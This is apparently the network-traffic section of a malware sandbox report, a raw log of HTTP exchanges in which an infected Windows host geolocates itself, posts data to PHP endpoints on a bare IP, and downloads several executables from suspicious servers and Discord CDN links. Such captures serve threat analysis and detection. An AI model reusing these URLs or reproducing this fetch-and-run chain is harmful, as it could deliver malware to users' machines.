Network Analysis

GET /demo/home.php?s= HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Mon, 08 Jul 2024 02:08:17 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive x-iplb-request-id: AC46C794:DFBA_93878F2E:0050_668B4A11_1786A40D:4F34 x-iplb-instance: 59215 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5dN91pZVR65zGvpONlHqxHfxQMemxd6hO2uFpy8HDlHflexr%2FSwXLumJxuWlviSQJ%2FHjkMyC6TN42sEoAApnu1LYhaZXQXpPBJ%2B97kuPpUAZ48i9%2BnhitWV8%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89fc868bbbaa29d2-FUK alt-svc: h3=":443"; ma=86400

GET /ssl/crt.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: lop.foxesjoy.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 08 Jul 2024 02:09:01 GMT Content-Type: application/octet-stream Content-Length: 5210795 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=crt.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tpxvDy5bqy5wr9FNbk5Onuswf8oaD%2Fkx41o4EL8VB4Np0HXL%2BFVRMS%2FyuLyFhTHamgSXOjOuV%2FFaNwNB%2FsAaOTo%2BAAWwTd%2FPeABb85QcP5nsOCp%2BJ5QmeDhOwsfl7NZJrg%2FO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89fc879d6fb82ae8-LAX alt-svc: h3=":443"; ma=86400

GET /api/crazyfish.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.99.177

HTTP/1.1 200 OK Date: Mon, 08 Jul 2024 02:08:16 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 6 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Mon, 08 Jul 2024 03:08:16 GMT Date: Mon, 08 Jul 2024 02:08:16 GMT Connection: keep-alive

POST /api/twofish.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 133 Host: 5.42.99.177

HTTP/1.1 200 OK Date: Mon, 08 Jul 2024 02:08:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 4056 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /download/123p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 77.105.133.27 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 08 Jul 2024 02:08:59 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Mon, 17 Jun 2024 13:05:54 GMT ETag: "a13400-61b15a0111080" Accept-Ranges: bytes Content-Length: 10564608 Content-Type: application/x-msdownload

HEAD /download/th/space.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 77.105.133.27 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 08 Jul 2024 02:08:59 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Description: File Transfer Content-Disposition: attachment; filename=soft4down.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 3792776 Content-Type: application/octet-stream

HEAD /d/385132 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 80.78.242.100 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 302 Found Server: nginx Date: Mon, 08 Jul 2024 02:08:59 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Keep-Alive: timeout=120 Location: https://cdn.discordapp.com/attachments/1259126895828533250/1259128511336157184/setup.exe?ex=668a8e4e&is=66893cce&hm=0f1b526f9bb810920ed14b90a79982e1a99fd5124fb69141388b02e419bb99ba&

HEAD /d/525403 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 80.78.242.100 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 302 Found Server: nginx Date: Mon, 08 Jul 2024 02:08:59 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Keep-Alive: timeout=120 Location: https://cdn.discordapp.com/attachments/1259126895828533250/1259159715418603570/setup.exe?ex=668aab5e&is=668959de&hm=211e284765069ea87d5cef594fa0da7dd62cea1ac487b1505e5882add2de5dcd&

HEAD /psyzh HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 176.111.174.109 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Mon, 08 Jul 2024 02:08:59 GMT Content-Type: application/octet-stream Content-Length: 0 Connection: keep-alive Content-Disposition: attachment; filename="0gtX5m243d.exe" Server-Timing: total;dur=3.3;desc="Total Response Time" content-transfer-encoding: Binary

HEAD /down/0GPThy6iSZBT.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 43.153.49.49:8888 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 404 Not Found Server: nginx Date: Mon, 08 Jul 2024 02:08:59 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive

GET /d/525403 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 80.78.242.100 Cache-Control: no-cache

HTTP/1.1 302 Found Server: nginx Date: Mon, 08 Jul 2024 02:08:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=120 Location: https://cdn.discordapp.com/attachments/1259126895828533250/1259159715418603570/setup.exe?ex=668aab5e&is=668959de&hm=211e284765069ea87d5cef594fa0da7dd62cea1ac487b1505e5882add2de5dcd&

GET /download/123p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 77.105.133.27 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 08 Jul 2024 02:09:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Mon, 17 Jun 2024 13:05:54 GMT ETag: "a13400-61b15a0111080" Accept-Ranges: bytes Content-Length: 10564608 Content-Type: application/x-msdownload

GET /psyzh HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 176.111.174.109 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Mon, 08 Jul 2024 02:08:59 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: keep-alive Content-Disposition: attachment; filename="HcXJgBOgi5.exe" Server-Timing: total;dur=434.8;desc="Total Response Time" content-transfer-encoding: Binary

GET /download/th/space.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 77.105.133.27 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 08 Jul 2024 02:09:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Description: File Transfer Content-Disposition: attachment; filename=soft4down.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 3792776 Content-Type: application/octet-stream

GET /d/385132 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 80.78.242.100 Cache-Control: no-cache

HTTP/1.1 302 Found Server: nginx Date: Mon, 08 Jul 2024 02:08:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=120 Location: https://cdn.discordapp.com/attachments/1259126895828533250/1259128511336157184/setup.exe?ex=668a8e4e&is=66893cce&hm=0f1b526f9bb810920ed14b90a79982e1a99fd5124fb69141388b02e419bb99ba&

POST /api/twofish.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 561 Host: 5.42.99.177

HTTP/1.1 200 OK Date: Mon, 08 Jul 2024 02:09:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Mon, 08 Jul 2024 03:09:45 GMT Date: Mon, 08 Jul 2024 02:09:45 GMT Connection: keep-alive